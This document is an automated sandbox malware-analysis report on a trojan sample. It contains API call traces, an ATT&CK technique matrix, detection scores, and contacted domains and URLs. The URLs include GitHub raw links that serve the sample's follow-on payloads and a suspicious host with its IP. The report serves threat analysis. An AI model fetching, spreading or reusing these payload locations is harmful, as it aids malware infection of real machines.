Source: C:\Windows\System32\console_zero.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,59_2_00007FF6F8C7F978
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,59_2_00007FF6F8C871C8
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,59_2_00007FF6F8C7F29C
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,59_2_00007FF6F8C87260
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,FormatMessageA,59_2_00007FF6F8C6FBA8
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,59_2_00007FF6F8C874A4
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,59_2_00007FF6F8C7F610
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,59_2_00007FF6F8C875FC
Source: C:\Windows\System32\console_zero.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,59_2_00007FF6F8C86D94
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesEx,59_2_00007FF6F8C7F540
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,59_2_00007FF6F8C876B0
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,59_2_00007FF6F8C877F4
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,59_2_00007FF6F8C870F8
Source: C:\Windows\System32\crypti.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,84_2_00007FF6D356869C
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesEx, 84_2_00007FF6D3568264
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoEx, GetLocaleInfoW, 84_2_00007FF6D3568334
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW, GetUserDefaultLCID, IsValidCodePage, IsValidLocale, GetLocaleInfoW, GetLocaleInfoW, 84_2_00007FF6D3571308
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW, 84_2_00007FF6D35711C4
Source: C:\Windows\System32\crypti.exe Code function: TranslateName, TranslateName, GetACP, IsValidCodePage, GetLocaleInfoW, 84_2_00007FF6D35708A8
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW, 84_2_00007FF6D3570CDC
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW, 84_2_00007FF6D3570C0C
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW, GetLocaleInfoW, GetACP, 84_2_00007FF6D3571110
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW, 84_2_00007FF6D3570FB8
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW, 84_2_00007FF6D3567FC0
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW, GetLocaleInfoW, GetLocaleInfoW, 84_2_00007FF6D3570D74
Source: C:\Windows\System32\crypti.exe Code function: AreFileApisANSI, EnumSystemLocalesEx, GetDateFormatEx, GetLocaleInfoEx, GetTimeFormatEx, GetUserDefaultLocaleName, IsValidLocaleName, LCMapStringEx, LCIDToLocaleName, LocaleNameToLCID, 87_2_00007FF6EA96869C
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW, 87_2_00007FF6EA970C0C
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW, 87_2_00007FF6EA970CDC
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW, 87_2_00007FF6EA970FB8
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW, 87_2_00007FF6EA967FC0
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW, GetLocaleInfoW, GetACP, 87_2_00007FF6EA971110
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW, GetLocaleInfoW, GetLocaleInfoW, 87_2_00007FF6EA970D74
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW, 87_2_00007FF6EA9711C4
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoEx, GetLocaleInfoW, 87_2_00007FF6EA968334
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW, GetUserDefaultLCID, IsValidCodePage, IsValidLocale, GetLocaleInfoW, GetLocaleInfoW, 87_2_00007FF6EA971308
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesEx, 87_2_00007FF6EA968264
Source: C:\Windows\System32\crypti.exe Code function: TranslateName, TranslateName, GetACP, IsValidCodePage, GetLocaleInfoW, 87_2_00007FF6EA9708A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe Code function: 3_2_00007FF646E5B6F4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00007FF646E5B6F4
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA3772860 GetUserNameA,GetLastError,_strdup,53_2_00007FFDA3772860
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55B6B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,53_2_00007FFDA55B6B40
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55BD5B2 calloc,calloc,calloc,bind,WSAGetLastError,53_2_00007FFDA55BD5B2
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA558C620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,53_2_00007FFDA558C620
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55BD7E0 calloc,calloc,calloc,bind,WSAGetLastError,53_2_00007FFDA55BD7E0
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55BD5B2 bind,WSAGetLastError,59_2_00007FFDA55BD5B2
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA558C620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,59_2_00007FFDA558C620
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55BD7E0 bind,WSAGetLastError,59_2_00007FFDA55BD7E0
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55778B0 memset,strncmp,strncmp,strchr,inet_pton,htons,strtoul,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,59_2_00007FFDA55778B0
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55B6B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,59_2_00007FFDA55B6B40
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55B6B0D htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,59_2_00007FFDA55B6B0D
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 11 System Time Discovery | 1 Exploitation of Remote Services | 12 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 Valid Accounts | 1 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 111 Windows Service | 1 Access Token Manipulation | 2 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Service Execution | 1 Scheduled Task/Job | 111 Windows Service | 1 DLL Side-Loading | NTDS | 32 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 11 File Deletion | LSA Secrets | 221 Security Software Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Scheduled Task/Job | 121 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Valid Accounts | DCSync | 121 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 121 Virtualization/Sandbox Evasion | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 12 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph ID: 1496433, Sample: Ld0f3NDosJ.exe, Startdate: 21/08/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
Ld0f3NDosJ.exe | 53% | ReversingLabs | Win32.Trojan.Generic |
Ld0f3NDosJ.exe | 54% | Virustotal | | Browse
Ld0f3NDosJ.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\pyld64.exe | 100% | Joe Sandbox ML | |
C:\Windows\System32\x543664.dat | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe | 18% | ReversingLabs | Win64.Trojan.Generic |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe | 65% | Virustotal | | Browse
C:\Users\user\Desktop\pyld64.exe | 18% | ReversingLabs | Win64.Trojan.Generic |
C:\Users\user\Desktop\pyld64.exe | 65% | Virustotal | | Browse
C:\Windows \System32\printui.dll | 62% | ReversingLabs | Win64.Trojan.Generic |
C:\Windows \System32\printui.exe | 0% | ReversingLabs | |
C:\Windows\System32\console_zero.exe | 18% | ReversingLabs | Win64.Trojan.CrypterX |
C:\Windows\System32\libcrypto-3-x64.dll | 0% | ReversingLabs | |
C:\Windows\System32\libcurl.dll | 0% | ReversingLabs | |
C:\Windows\System32\libiconv-2.dll | 0% | ReversingLabs | |
C:\Windows\System32\libintl-9.dll | 0% | ReversingLabs | |
C:\Windows\System32\libpq.dll | 0% | ReversingLabs | |
C:\Windows\System32\libssl-3-x64.dll | 0% | ReversingLabs | |
C:\Windows\System32\libwinpthread-1.dll | 0% | ReversingLabs | |
C:\Windows\System32\ucrtbased.dll | 0% | ReversingLabs | |
C:\Windows\System32\usvcinsta64.exe | 58% | ReversingLabs | Win64.Trojan.Nekark |
C:\Windows\System32\vcruntime140d.dll | 0% | ReversingLabs | |
C:\Windows\System32\x543664.dat | 42% | ReversingLabs | Win64.Trojan.Generic |
C:\Windows\System32\zlib1.dll | 0% | ReversingLabs | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
ipinfo.io | 0% | Virustotal | | Browse
github.com | 0% | Virustotal | | Browse
raw.githubusercontent.com | 0% | Virustotal | | Browse
tse1.mm.bing.net | 0% | Virustotal | | Browse
ax-0001.ax-msedge.net | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
runvrs.com | 38.180.213.183 | true | false | | unknown
ipinfo.io | 34.117.59.81 | true | false | | unknown
github.com | 140.82.121.3 | true | false | | unknown
raw.githubusercontent.com | 185.199.108.133 | true | false | | unknown
ax-0001.ax-msedge.net | 150.171.27.10 | true | false | | unknown
tse1.mm.bing.net | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exesLd0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3C6000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3C4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/http-cookies.htmlpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exent.com1Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeLMEMLd0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.datsvchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3360844690.000001BB8BA48000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpuwsys.datsvchost.exe, 00000035.00000003.2846038368.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2914585077.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3178715641.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3113596577.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3361335703.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3048858018.000001BB8BAF2000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/1F7Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.gnu.org/licenses/pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3359858423.00000000660F4000.00000008.00000001.01000000.00000013.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeNHLd0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/alt-svc.htmlpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://www.openssl.org/svchost.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF3B4000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF3B4000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeQgLd0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/hsts.htmlpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/alt-svc.html#console_zero.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/copyright.htmlDpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613577176.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/svchost.exe, console_zero.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/bGLd0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://www.zlib.net/svchost.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeULd0f3NDosJ.exe, 00000003.00000002.2356237105.000001E8BF34C000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://mingw-w64.sourceforge.net/Xpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/copyright.htmlsvchost.exe, console_zero.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://worldtimeapi.org/api/timezone/Etc/UTCpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2612733960.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000003B.00000002.2612200244.000001D64B0CC000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000003B.00000000.2583942814.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
